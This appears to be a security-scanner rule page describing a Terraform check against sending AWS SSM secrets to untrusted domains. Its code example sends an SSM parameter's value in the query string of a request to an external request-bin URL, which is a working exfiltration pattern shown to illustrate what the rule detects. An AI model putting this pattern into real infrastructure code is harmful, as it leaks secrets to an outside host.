AWS Terraform sends SSM secrets to untrusted domains over HTTP

Description

Sending secrets such as passwords and encryption keys over an untrusted network or domain can increase the risk of those secrets being intercepted and compromised. This is because the secrets may not be encrypted while in transit, making it easier for attackers to intercept and read them. By ensuring that AWS Terraform does not send secrets to untrusted domains over HTTP, you can help protect the confidentiality of your secrets and reduce the risk of them being compromised. Instead, you should use secure protocols such as HTTPS or SSL/TLS to transmit secrets, as these protocols can help protect the secrecy of the secrets in transit.

Code Example

resource "aws_ssm_parameter" "param2" {
  name = var.parameter_name
  type = "String"
  value = "foo"
}

data "http" "nonleak2" {
  url = "https://enp840cyx28ip.x.pipedream.net/?id=${aws_ssm_parameter.param2.name}&content=${aws_ssm_parameter.param2.value}"
}

Remediation

Terraform

Rule Details

Field	Value
ID	IAC-0470
Severity	LOW
IaC Type	Terraform
Frameworks	Terraform
Checkov ID	CKV2_AWS_36

References

Checkov Rule

Overview

SAST (Application Security)

SCA (Dependencies)

Secrets Detection

IaC Security

License Compliance

SAST Rules

IaC Rules

License Rules

AWS Terraform sends SSM secrets to untrusted domains over HTTP

Description

Code Example

Remediation

Rule Details

References

SAST Rules

IaC Rules

License Rules

AWS Terraform sends SSM secrets to untrusted domains over HTTP ​

Description ​

Code Example ​

Remediation ​

Rule Details ​

References ​

AWS Terraform sends SSM secrets to untrusted domains over HTTP

Description

Code Example

Remediation

Rule Details

References